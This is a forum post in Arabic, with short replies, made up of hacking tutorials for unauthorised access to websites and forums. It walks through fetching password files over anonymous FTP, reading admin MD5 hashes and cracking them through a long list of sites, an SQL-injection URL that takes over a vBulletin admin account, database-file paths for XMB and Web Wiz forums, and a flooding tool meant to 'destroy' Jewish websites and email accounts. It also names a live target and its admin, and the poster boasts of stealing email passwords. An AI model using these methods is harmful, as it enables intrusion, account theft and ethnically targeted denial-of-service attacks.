السلام عليكم

لمراسلة المشرف على
f-xx@w.cn طبعا لا تخاااف مني اي مساعده انا حاظر (استعادة اميلات) اذا اختراق بلله لا تجي وتسوي زحمة

بسم الله

* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

User name-Password

وهما يكونان محفوظين في ملف يسمي

PASSWDغالبا

بعض المواقع تضع هذا الملف في الإف تي بي

ما هو إف تي بي؟

FTP=File Transfer Protocol بروتوكول نقل الملفات

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

start==>run إبدأ ثم تشغيل

واكتب telnet

سيفتح التلنت اضغط علىRemote System ==> connect

ثم اكتب الموقع في Host Name مثلا

xxxx.com أو الآيبي الخاص به

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

ثم اضغط connect

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

user anonymous

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

passzzzoozz@yahoo.com

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

بعدها سنحصل على ملف الباسوورد

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

cute ftp - ws_ftp


مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

ftp.xxxx.com

لتحصل على الملف في التلنت اكتب

retr /etc/passwd

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها


أغلب استخدامات الدوس المعروفة

1-command هذا الامر يدخلك الى موجه الدوس .
2-regedit هذا الامر لمحرر سجل الوندووز ( الشجرة ) .
3-icwscrpt هذا الامر خاص بنسخ ملفات الـ dll
4-scandskw هذا الامر لعمل تفحص للاقراص .
5-imgstart هذا الأمر لتشغيل قرص ويندووز المضغوط
6-msiexec حقوق تركيب ويندووز .
7- : d : c للوصول السريع إلى الدرايفرات
8-hwinfo /ui لمعرفة معلومات عن جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك
9-cleanmgr وهذا الامر يشغل برنامج تنظيف القرص
10-packager وهذا الامر لبرامج يغير الايقونات
11-recent هذا الامر لإستعراض ملف المستندات ( الموجود في قائمة إبدأ
12-- sysedit هذا الامر(لفتح محرر تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية :
protocol.ini
system.ini
win.ini
config.sys
autoexec.bat
13-sfc وهذا الامر لإسترجاع بعض ملفات الـ dll عندما تتلف
14-taskman وهذا الامر لمشاهدة البرامج التي تعمل حاليا
15-debug لمعرفة نوع كرت الفيديو او الشاشة
16-DEFRAG لإلغاء تجزئة القرص
17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم
18-winipcfg لمعرفة IP
19-TEMP للوصول الى ملفات الويندوز المؤقتة
20-- tuneup هذا الامر لتشغيل برنامج معالج الصيانة
21-mobsync هذا الامر لظهور برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال
22-cdplayer هذا الامر لتشغيل برنامج قاريء الأقراص المضغوطة
23-ftp هذا الامر لجلب البرامج بسرعه من الدوس .
24-Tips.txt هذا الأمر يظهر بعض أسرار ويندووز 98
25-- telnet وهذا الامر يشغل برنامج telnet
26-progman وهذا الامر يأخذك الى قائمة البرامج.
27-drwatson أداة لتشخيص أخطاء النظام.
28-cliconfg.
29-- mkcompat.
30-CVT1.***
هذا الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32
31-SCANREG
مدقق تسجيل ويندوزلتفحص التسجيل
32-Tune up
هذا الأمر لتشغيل معالج الصيانة ومن مهامه:
1/ تسريع البرامج المستخدمة بشكل متكرر
2/ تدقيق القرص الثابت لاستكشاف الأخطاء
3/ حذف الملفات الغير ضرورية من الجهاز
ويمكن استخدام هذا الأمر لنفس الغرض TUNEUP.***
34-SYSEDIT
محرر تكوين النظام لا ينصح بتغيير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة تامة بالتعديلات التي يريدون عملها على هذا المحرر
35-VCMUI
أداة تعارض الإصدارة وظيفتها التحقق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة مختلفة قبل تثبيت النظام لاستعادتها
شرح مبسط عن هذه الأداة:
أثناء تثبيت برامج جديدة، بما فيها Windows 98، قد يتم الكشف عن الإصدار القديمة لملفات
البرامج واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارات السابقة وتُحفظ
على القرص الثابت.
في حال وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة تعارض
الإصدار لاستعادة ملف النسخة الاحتياطية.
وتذكر إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة الاحتياطية،
وأرقام الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة الاحتياطية،
حينئذ، يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين.
ملاحظة مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام
36-UPWIZUN
إلغاء تثبيت معالج التحديث وظيفته كالتالي:
ربما قد استخدمت Windows Update لتثبيت إصدار محدّث من أداة تصحيح،
أو برنامج تشغيل، أو أداة نظام. إذا قررت فيما بعد إلغاء تثبيت الإصدار الجديد،
ولم تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث
للعودة إلى الإصدار السابق.
37-Asd.***
أداة تشغيل عامل برنامج تشغيل التخطي التلقائي
وظيفته: يعرّف برنامج تشغيل التخطي التلقائي (ASD) حالات الفشل
التي تسببت في توقف Windows عن الاستجابة في عمليات بدء التشغيل السابقة
ويضع عليها علامات بحيث يتم تجاوزها في عمليات بدء التشغيل اللاحقة.
يذكر ASD كافة الأجهزة أو العمليات التي فشل بدء تشغيلها. ويمكنك استخدام ASD لتمكين
أي جهاز تم تعطيله سابقاً بواسطة ASD، وسيحاول Windows استخدام الجهاز
في محاولة بدء التشغيل التالية. وفي حال الفشل، يتوقف الكمبيوتر عن الاستجابة.
وعند إعادة تشغيل الكمبيوتر مرة أخرى، يمنع ASD تشغيل العملية سامحاً لك ببدء تشغيل الكمبيوتر...............


ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــــــــــ ـــــــــــــــــ ـــــــــــــــــــــــــــــــــــــــ
طريقه اختراق المنتديات في القل من 10 دقاق والثغر الكل يعرفه بس الطريقه سهل بس الكل يتبع الشرح


نبدى الشرح


اولا شيء نعرف ان منتدى الفي بيه يكون رابطه هاكذا www.XXXX.com/vb صح

ثانين كذا الرابط صح www.XXX.com/ نضيف لرابط admincp

يعني يصير الرابط كذا www.xxxx.com/admincpصح مكان الاكس المنتدى الي تبي تخترقه

بعدين اذا طلع لك مربع صغير يطلب منك الباسورد واليوزر نيم هذا جدار ناري

ومافي حل لهاذا

واذا طلع لوحه التحكم انت نجحت
ويطلب منك اليوزر والباسورد خله يولي وكمل الشرح
بعد ماتطلع لوحه التحكم فوق في الانترنت اكسبلورر في المتصفح اضغط view
وبعدين بتطلع خيارات اضغط على الخيار source وبيطلع ملف تي اكس تيه مكتوب فيه كلام وايد اضغط في ملف التي اكس تيه على edit ومن ثمه find وفيه المربع اكتب value واضغط ثيكست حت توصل لكود يتكون من 32 حرف

مثل هذا 1c543eb5848aa6567fdc633b46b6874b

بعد ماتفك هذا الكود من هذا الموقع يفك التشفيره http://www.milw0rm.com/md5/
وهذه كم موقع كمان تفك التشفير
مواقع لفك شفرة المنتديات
http://www.******kid.net/projectx/gmd5[/url]
http://www.shm.hard-core.pl/md5
http://www.schwett.com/md5
http://www.thepanicroom.org/index.php?view=cracker
http://www.us.md5.crysm.net
http://www.und0it.com
http://www.xeons.net/genesis
http://www.xmd5.org/index_en.htm

http://www.ds.nfshost.com/MD5calc
http://www.gdataonline.com/seekhash.php
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.lasecwww.epfl.ch/~oechslin/projects/ophcrack
http://www.milw0rm.com/md5
http://www.md5.benramsey.com
http://www.md5.altervista.org
http://www.md5.shalla.de
http://www.md5.csthis.com/
http://www.md5.rednoize.com
http://www.md5.overclock.ch/biz/inde...=md5crack&l=en
http://www.md5.xpzone.de
http://www.md5lookup.com/?category=main&page=search
http://www.md5crack.it-helpnet.de/index.php?op=entries
http://www.mmkey.com/md5/
http://www.nz.md5.crysm.net
http://www.neeao.com/md5/
http://www.passcrack.spb.ru/index.php?name=CrackMD5
http://www.plain-****.info
http://www.passcracking.com
http://www.plain-****.info
http://www.passcracking.ru
http://www.rainbowcrack-online.com
http://www.sarcaprj.wayreth.eu.org/index.php
http://www.securitystats.com/tools/hashcrack.php

http://www.md5lookup.com/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-****.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.securitystats.com/tools/hashcrack.php
http://www.md5decrypter.com
http://www.md5encryption.com/
http://www.md5data****.net/
http://md5.xpzone.de/
http://www.milw0rm.com/md5/info.php
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in...roducts_ id=7http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
https://www.astalavista.net/v2/?cmd=rainbowtables
http://www.csthis.com/md5/index.php
http://www.cijfer.hua.fi/
http://www.cmd5.com/english.htm
http://www.darkdevelopments.com/modu...me=Reverse_MD5



وبعد ماتفكه بيطلع باسورد الادمن وبعدين ابحث عن اسم الادمن ويكون رقم الادمن 1 100%100 او 2

وحط الباسوورد واليوز نيم ودخل لوحه التحكم وسو الي تبيه


وهذا موقع للتجريب
http://forums.miranda-im.org/admincp/

وهذا اسم الادمن في هذا الموقع rainwater


ماعليك اله تفك الشفره وتخترق الموقع على كيفك

ـــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــ
شرح اقوى براج لتدمير المواقع اليهوديه
برنامج الهجوم هو Hak Tek
التحميل البرنامج
http://www.geocities.com/soso_ta90_mo/haktek.zip
الرابط الثاني http://www.geocities.com/ansarhack/haktek.zip
الرابط الثالث http://www.geocities.com/soso_ta90_mo/haktek.zip
شرح البرامج
برنامج ال Hak Tek v1.1 هو برنامج لتدمير المواقع والايميلات ولعمل سكان للمواقع و غيرها وتم تجربة البرنامج وأثبت فاعليته والبرنامج ليس عربي لذلك هو غير معروف عند العرب والبرنامج هذا لا يستخدم الدوس بالهجوم ولا يبطئ الاتصال و لا يوجد برنامج تحدد قوة هجومه وعدد الضربات و الوقت بين الضربه والثانيه بالبايتس مثل ما انت تبغا الا هذا البرنامج الجميل والفعال فتستطيع أن تضرب الموقع بقوة 100000000بايتس أي 100000 كيلو بايتس أي 100 ميغا بايت لوحدك للذي يملك اتصال سريع (ADSL)



اضغط الرقم 1 وستظهر لك نافذة تحديد عنوان الموقع المستهدف التي تحت هذه الكتابه اكتب اسم الموقع المستهدف الي هو في الفراغ واضغط ok

اضغط الايقونه المكتوب عليها الرقم 2 وستظهر لك نافذة خيارات الهجوم شاهد الصوره تحت هذه الكتابه وأول فراغ(time out) وهو الوقت بين كل ضربه لا تغيره ابقيه على الرقم 10000 أما ثاني فراغ (count) ضع به عدد الضربات (الهجمات) أما الفراغ الثالث (bytes) ضع به قوة الهجوم بالبايت واذا كان اتصالك سرعته عاديه فضع قوة الهجوم 15000 أو أقل من ذلك يعني ضع بتقدر تترك قوة الهجوم مثل ما هي 1024 بايتس اذا اتصالك سرعه عاديه أما اذا كان اتصالك سريع (adsl) فضع قوة الهجوم أكثر من 15000 أو أقل مثل من عاوز لأنه اتصالك سريع الله يباركلك الآن عندما يشتغل البرنامج سوف يظهر لك الكتابات التاليه
اذا ظهر لك هذا
Reply from 209.216.249.194 round trip time = 8569 ms
معناها أن الضربه نجحت
اذا ظهر لك هذا
Error! "Request timed out
معناها أن هذه الضربه فشلت
اذا ظهر لك هذا
Error! "No resoureces.Your computer is bogged down. Reboot, and dont run 10copies of IE and
معناه أن اما أن الموقع تعطل وتدمر
او
أن اتصالك ضعيف ومن ظهر له هذا الأمر كثيرا عند تشغيل البرنامج عليه أن يقلل من قوة الهجوم بالبايت وذلك حسب سرعة اتصالك
وتستطيعون تشغيل البرنامج أكثر من 20 مره بنفس الطريقه السابقه ولكن اذا شغلت البرنامج أكثر من 20 أو مرات كثيره عليك مراعاة التقليل من قوة الهجوم والا سيظهر لك Error! "No resoureces.Your computer is bogged down. Reboot, and dont run 10 copies of IE and لأن الاتصال سيضعف للذين يملكون سرعة انترنت عاديه و مثلا افتح البرنامج 5 مرات بقوة 10000 بايتس وخمس مرات بقوة 5000 بايتس وعليك التنويع بقوة الهجمه حتى لا يضعف اتصالك ويذهب كل عملك سدى والعياذ بالله وبتقدر تفتح البرنامج عشر مرات أو أقل بقوة 5000000 بايتس أي 5 ميغا بايتس و على قد ما تقدروا تزيدوا قوة الهجوم زيدوا حسب سرعة اتصالكم لأن كلما زدنا رقم قوة الهجوم بالبايتس سيساعدنا ذلك على تدمير الموقع و الجميل بالبرنامج أنه لا يستخدم الدوس بالهجوم ولا يبطئ الاتصال و لا يوجد برنامج تحدد قوة هجومه بالبايتس مثل ما انت عاوز الا هذا البرنامج الجميل والفعال فتستطيع أن تضرب الموقع بقوة 100000000بايتس أي 100000 كيلو بايتس أي 100 ميغا بايت لوحدك للذي يملك اتصال سريع (ADSL)



الآن نحن انتهينا من شرح طريقة تدمير المواقع باستخدام هذا البرنامج وسنشرح باقي مهام برنامج Hak Tak
شرح باقي مهام برنامج Hak Tak

الايقونه أو الزر رقم ثلاث(3) لعمل بحث أي سكان على بورتات الموقع الذي تحتدده وهذا يساعدك في اختراق الموقع
الايقونه أو الزر رقم أربعه(4) لتدمير أي اميل (بريد الكتروني) تحدده
الايقونه أو الزر رقم خمسه(5) لحماية بريدك من التدمير ومنع تدميره
الايقونه أو الزر رقم سته(6) من أجل عمل سكان لأي آي بي وهذا يساعد في اختراق الاجهزة والشبكات وغيرها
CC0000


ــــــــــــــــــــــــــــــــــــــــــــــــــ ـــــــــــــــــــ
Hacking web1.1
رابط التحميل

http://www.tntup.com/file.php?file=0...5b624f8db77a10
( أختراق المواقع ) لاحظت انه اغلب الاختراقات تكون عن طريق المتصفح ...أي مثلا
تريد أن تخترق موقع مصمم بالفونت بيج
تضيف بعد دوت كوم سلاش ثم _vti_pvt هذا مثال فقط ودائما أنا شخصيا أخطأ عندما
اريد ان أكتب هذه الكلمه عند موقع معين مصمم بالفرونت بيج يعني انسى كيف كتابه الكلمه ..

.. البرنامج بسيط ويجتاج إلى تطوير ان شاء الله ...
بصراحة البرنامج مساعد فقط وشوف معي شكل البرنامج

اسم البرنامج Hacking web1.1

هذه واجهه البرنامج عند تشغيل وفيه العناوين التاليه
نوع الثغرة
مسار الوصول إلى مجلد الباسورد
أسماء ملفات الباسورد .. أو المعلومات للتنبيه
طبعا لما تضغط على القائمه المنسدلة سوف تظهرلك قائمه باسماء الثغرات
شوف هذه الصورة للتوضيح




لما نحدد أحد الثغرات سوف تظهر لنا المعلومات
لكي نتمكن من اختراق الموقع الذي يتحتوي على
هذه الثغرة مثلا على سبيل المثال لنفرض انه كل ما عليك
منتدى من نوع Web Wiz forum
هو تحديد الثغرة وسوف تظهر لك كل المعلومات
التي تستطيع بواستطتها أختراق الموقع
صوره توضيحيه


الشرح



عند الرقم 1 هنا عندما تكتب هذا المسار سوف تتمكن للوصول إلى
الباسوردات حق الادمن وكذك الاعضاء التي هي مخزنه في قاعدة بيانات
وعند الرقم 2 بعد الحصول على الباسورد حق الأدمن من خلال هذا الرابط تستطيع ان تذهب إلى
المكان المخصص لدخول الادمن على لوحة التحكم
وعند الرقم 3 لما تضغط على زرgo سوف يفتح لك الصفحة وبعد أضافة اسم الموقع
بدلا منxxx

وبس وأنتهى الشرح .. صحيح انه البرنامج بسيط ولكن بصراحة رائع يقوم
بمساعدتك في الحصول على العناوين...
وعلى فكرة هذا البرنامج ليس للمبتدئين ولكن للذين عندهم خبرة في اختراق المواقع
يعني لوكان شخص مبتدء لا يعرف شيء لن يفهم لهذا البرنامج ...
ــــــــــــــــــــــــــــــــــــــــ
إختراق منتديات VP
======================================
اختراق المنتديات بس بمنتديات vb

. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
http://URL/memberlist.php

URL = العنوان المستضيف للمنتدى

مثل = - .com

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

http://URL/member.php?soitgoe68e45u...&userid=266

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا


http://URL/member.php?soitgoe68e45u...fo&userid=1

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

http://URL/member.php?action=login&...IDPASS&url=');'.$users= $DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+ WH E RE+username='ADMIN'').'

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .

8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :

أنت قمت بكتابة كلمة سر خاطئة

you typed in the wrong password



9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى


======================================
إختراق منتديات xmb
======================================
تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..

وصف للثغره::
وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر

الأصدار المصاب:::
XMB 1.6 Magic Lantern Final

الشرح والتطبيق:::
جا وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:

1- عليك بالذهاب الى موقع جوجل http://www.google.com/
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون زي كده
http://www.******.com/massegboard/index_log.log
5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك زي
كده مثلا::

xmbuser=admin
واباس راح تلقاه قدامه زي كده
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
ftp://www.cafecounterintelligence.com/cci/chigger.***




إختراق منتديات Web Wiz Guide
======================================
مثال:http://host.basharnet.com/forum

بسم الله الرحمن الرحيم

السلام عليكم

الشرح: ثغرة تصيب منتديات Web Wiz Guide

أولا إذهب إلى google
اكتب
Web Wiz forum

وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
admin/wwforum.mdb

حمل الملف وادخل عليه عن طريق microsoft office access

بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin

سجل اسمك والباسوورد

الآن أنت في لوحة التحكم


ارجو عدم ضر اخوننا المسلمين










شباب اذا تم سرقة اميلك قبل مدة جرب هذاالباسورد يمكن اكون انا الي سرقة
azoooz1412
او 1412963210
او 9632101412

عليكم السلام

_________________

مشكووووووووووور

_________________

_________________

مشكووووووور ...

_________________
JOKAR1000@HOTMAIL.COM